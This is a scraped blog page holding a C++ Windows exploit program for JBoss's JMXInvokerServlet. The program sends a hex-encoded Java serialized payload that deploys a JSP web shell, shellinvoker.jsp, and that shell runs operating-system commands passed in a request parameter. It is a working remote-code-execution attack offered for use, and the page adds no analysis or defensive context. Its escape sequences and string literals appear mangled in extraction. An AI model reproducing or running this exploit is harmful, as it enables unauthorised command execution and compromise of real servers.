zoukankan      html  css  js  c++  java

  • Jboss remote getshell (JMXInvokerServlet) vc版

    #include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <winhttp.h>
#include <comdef.h>
#pragma comment (lib,"Winhttp.lib")

char shell_invoke[] = ( 
    "xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73" ///shellinvoker/shellinvoker.jsp
    "x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72"
    "x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f"
    "x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77"
    "x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76"
    "x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2"
    "xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75"
    "x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e"
    "x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00"
    "x78x70xe3x2cx60xe6x73x72x00x24x6fx72x67x2ex6ax62"
    "x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d"
    "x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc"
    "xe0xd1xf4x4axd0x99x0cx00x00x78x70x7ax00x00x02xc6"
    "x00x00x02xbexacxedx00x05x75x72x00x13x5bx4cx6ax61"
    "x76x61x2ex6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90"
    "xcex58x9fx10x73x29x6cx02x00x00x78x70x00x00x00x04"
    "x73x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65"
    "x6dx65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0f"
    "x03xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x2cx6a"
    "x62x6fx73x73x2ex61x64x6dx69x6ex3ax73x65x72x76x69"
    "x63x65x3dx44x65x70x6cx6fx79x6dx65x6ex74x46x69x6c"
    "x65x52x65x70x6fx73x69x74x6fx72x79x78x74x00x05x73"
    "x74x6fx72x65x75x71x00x7ex00x00x00x00x00x05x74x00"
    "x10x73x68x65x6cx6cx69x6ex76x6fx6bx65x72x2ex77x61"
    "x72x74x00x0cx73x68x65x6cx6cx69x6ex76x6fx6bx65x72"
    "x74x00x04x2ex6ax73x70x74x01x79x3cx25x40x20x70x61"
    "x67x65x20x69x6dx70x6fx72x74x3dx22x6ax61x76x61x2e"
    "x75x74x69x6cx2ex2ax2cx6ax61x76x61x2ex69x6fx2ex2a"
    "x22x25x3ex3cx70x72x65x3ex3cx25x69x66x28x72x65x71"
    "x75x65x73x74x2ex67x65x74x50x61x72x61x6dx65x74x65"
    "x72x28x22x70x70x70x22x29x20x21x3dx20x6ex75x6cx6c"
    "x20x26x26x20x72x65x71x75x65x73x74x2ex67x65x74x48"
    "x65x61x64x65x72x28x22x75x73x65x72x2dx61x67x65x6e"
    "x74x22x29x2ex65x71x75x61x6cx73x28x22x6ax65x78x62"
    "x6fx73x73x22x29x20x29x20x7bx20x50x72x6fx63x65x73"
    "x73x20x70x20x3dx20x52x75x6ex74x69x6dx65x2ex67x65"
    "x74x52x75x6ex74x69x6dx65x28x29x2ex65x78x65x63x28"
    "x72x65x71x75x65x73x74x2ex67x65x74x50x61x72x61x6d"
    "x65x74x65x72x28x22x70x70x70x22x29x29x3bx20x44x61"
    "x74x61x49x6ex70x75x74x53x74x72x65x61x6dx20x64x69"
    "x73x20x3dx20x6ex65x77x20x44x61x74x61x49x6ex70x75"
    "x74x53x74x72x65x61x6dx28x70x2ex67x65x74x49x6ex70"
    "x75x74x53x74x72x65x61x6dx28x29x29x3bx20x53x74x72"
    "x69x6ex67x20x64x69x73x72x20x3dx20x64x69x73x2ex72"
    "x65x61x64x4cx69x6ex65x28x29x3bx20x77x68x69x6cx65"
    "x20x28x20x64x69x73x72x20x21x3dx20x6ex75x6cx6cx20"
    "x29x20x7bx20x6fx75x74x2ex70x72x69x6ex74x6cx6ex28"
    "x64x69x73x72x29x3bx20x64x69x73x72x20x3dx20x64x69"
    "x73x2ex72x65x61x64x4cx69x6ex65x28x29x3bx20x7dx20"
    "x7dx25x3ex73x72x00x11x6ax61x76x61x2ex6cx61x6ex67"
    "x2ex42x6fx6fx6cx65x61x6excdx20x72x80xd5x9cxfaxee"
    "x02x00x01x5ax00x05x76x61x6cx75x65x78x70x01x75x72"
    "x00x13x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex53x74"
    "x72x69x6ex67x3bxadxd2x56xe7xe9x1dx7bx47x02x00x00"
    "x78x70x00x00x00x05x74x00x10x6ax61x76x61x2ex6cx61"
    "x6ex67x2ex53x74x72x69x6ex67x71x00x7ex00x0fx71x00"
    "x7ex00x0fx71x00x7ex00x0fx74x00x07x62x6fx6fx6cx65"
    "x61x6ex63x79xb8x87x78x77x08x00x00x00x00x00x00x00"
    "x01x73x72x00x22x6fx72x67x2ex6ax62x6fx73x73x2ex69"
    "x6ex76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61"
    "x74x69x6fx6ex4bx65x79xb8xfbx72x84xd7x93x85xf9x02"
    "x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00"
    "x00x04x70x78");

void request_https(wchar_t* Host,int port)
{
    DWORD dwSize = 0;
    DWORD dwDownloaded = 0;
    LPSTR pszOutBuffer;
    BOOL bResults = FALSE;
    HINTERNET hSession = NULL,
        hConnect = NULL,
        hRequest = NULL;

    // Use WinHttpOpen to obtain a session handle.
    hSession = WinHttpOpen( L"WinHTTP Example/1.0",
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
        WINHTTP_NO_PROXY_NAME,
        WINHTTP_NO_PROXY_BYPASS, 0);

    // Specify an HTTP server.
    if (hSession)
        hConnect = WinHttpConnect( hSession,Host,
        port, 0);

    // Create an HTTP request handle.
    if (hConnect)
        hRequest = WinHttpOpenRequest( hConnect, L"POST",L"/invoker/JMXInvokerServlet",
        NULL, WINHTTP_NO_REFERER,
        WINHTTP_DEFAULT_ACCEPT_TYPES,
        WINHTTP_FLAG_SECURE);

    DWORD options = SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
        SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
        SECURITY_FLAG_IGNORE_UNKNOWN_CA ;

    if( hRequest )
        bResults = WinHttpAddRequestHeaders( hRequest,
        L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
        ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

    bResults = WinHttpAddRequestHeaders( hRequest, 
        L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

    bResults = WinHttpSetOption( hRequest, WINHTTP_OPTION_SECURITY_FLAGS ,
        (LPVOID)&options, sizeof (DWORD) );

    if(bResults == FALSE){
        printf("Error in WinHttpQueryOption WINHTTP_OPTION_SECURITY_FLAGS: %ld
",GetLastError());
    }

    // Send a request.
    if (hRequest){
        bResults = WinHttpSendRequest( hRequest,
            WINHTTP_NO_ADDITIONAL_HEADERS, 0,
            shell_invoke, WORD(sizeof(shell_invoke)),
            sizeof(shell_invoke), 0);
        if(bResults == FALSE)
            printf ("WinHttpSendRequest error: %ld
",GetLastError());
    }

    if( hRequest ) WinHttpCloseHandle( hRequest );
    if( hConnect ) WinHttpCloseHandle( hConnect );
    if( hSession ) WinHttpCloseHandle( hSession );
}


void request_http(wchar_t* Host, int Port)
{
    DWORD dwSize = sizeof(DWORD);
    DWORD dwStatusCode = 0;
    BOOL  bResults = FALSE;
    HINTERNET hSession = NULL,
    hConnect = NULL,
    hRequest = NULL;

    // Use WinHttpOpen to obtain a session handle.
    hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36", 
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
        WINHTTP_NO_PROXY_NAME, 
        WINHTTP_NO_PROXY_BYPASS,
        0 );

    // Specify an HTTP server.
    if( hSession )
        hConnect = WinHttpConnect( hSession,
        Host,
        Port,
        0 );

    // Create an HTTP Request handle.
    if( hConnect )
        hRequest = WinHttpOpenRequest( hConnect,
        L"POST",L"/invoker/JMXInvokerServlet",  // /invoker/JMXInvokerServlet
        NULL,
        WINHTTP_NO_REFERER, 
        WINHTTP_DEFAULT_ACCEPT_TYPES,
        0 );
    // Add a request header.
    if( hRequest )
        bResults = WinHttpAddRequestHeaders( hRequest,
        L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
        ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

        bResults = WinHttpAddRequestHeaders( hRequest, 
            L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    // Send a Request.
    if( bResults ) 
        bResults = WinHttpSendRequest( hRequest, 
        WINHTTP_NO_ADDITIONAL_HEADERS,
        0,
        shell_invoke,WORD(sizeof(shell_invoke)),
        sizeof(shell_invoke),
        0 );

    // Report any errors.
    if( !bResults )
        printf( "Error %d has occurred.
", GetLastError( ) );

    // Close open handles.
    if( hRequest ) WinHttpCloseHandle( hRequest );
    if( hConnect ) WinHttpCloseHandle( hConnect );
    if( hSession ) WinHttpCloseHandle( hSession );
    //return 0;
}

int main(int argc, char* argv[])
{

    if (argc < 4)
    {
        printf("[*]:%s Jboss Exploit remote getshell
",argv[0]);
        printf("[*]:%s Remote_Host Remote_ip http/https 
",argv[0]);
        printf("[*]:Getshell Path:/shellinvoker/shellinvoker.jsp
");
        return -1;
    }
    wchar_t Host[MAX_PATH] = {0};
    wchar_t procotol[MAX_PATH] = {0};
    wsprintfW(Host, L"%S", argv[1]);
    wsprintfW(procotol,L"%S",argv[3]);
    printf("
[*]:Host:%S procotol:%S 
", Host,procotol);

    if (0 == lstrcmpi(procotol, L"http"))
    {
        request_http(Host,atoi(argv[2]));

    }else if(0 == lstrcmpi(procotol, L"https"))
    {
        request_https(Host,atoi(argv[2]));
    }else
    {
        printf("
Unknown option.
");
        return 0;
    }
    return 0;
}
  • 相关阅读:
    Get distinct count of rows in the DataSet
    单引号双引号的html转义符
    PETS Public English Test System
    Code 39 basics (39条形码原理)
    Index was outside the bounds of the array ,LocalReport.Render
    Thread was being aborted Errors
    Reportviewer Error: ASP.NET session has expired
    ReportDataSource 值不在预期的范围内
    .NET/FCL 2.0在Serialization方面的增强
    Perl像C一样强大,像awk、sed等脚本描述语言一样方便。
  • 原文地址:https://www.cnblogs.com/killbit/p/4489664.html
Copyright © 2011-2022 走看看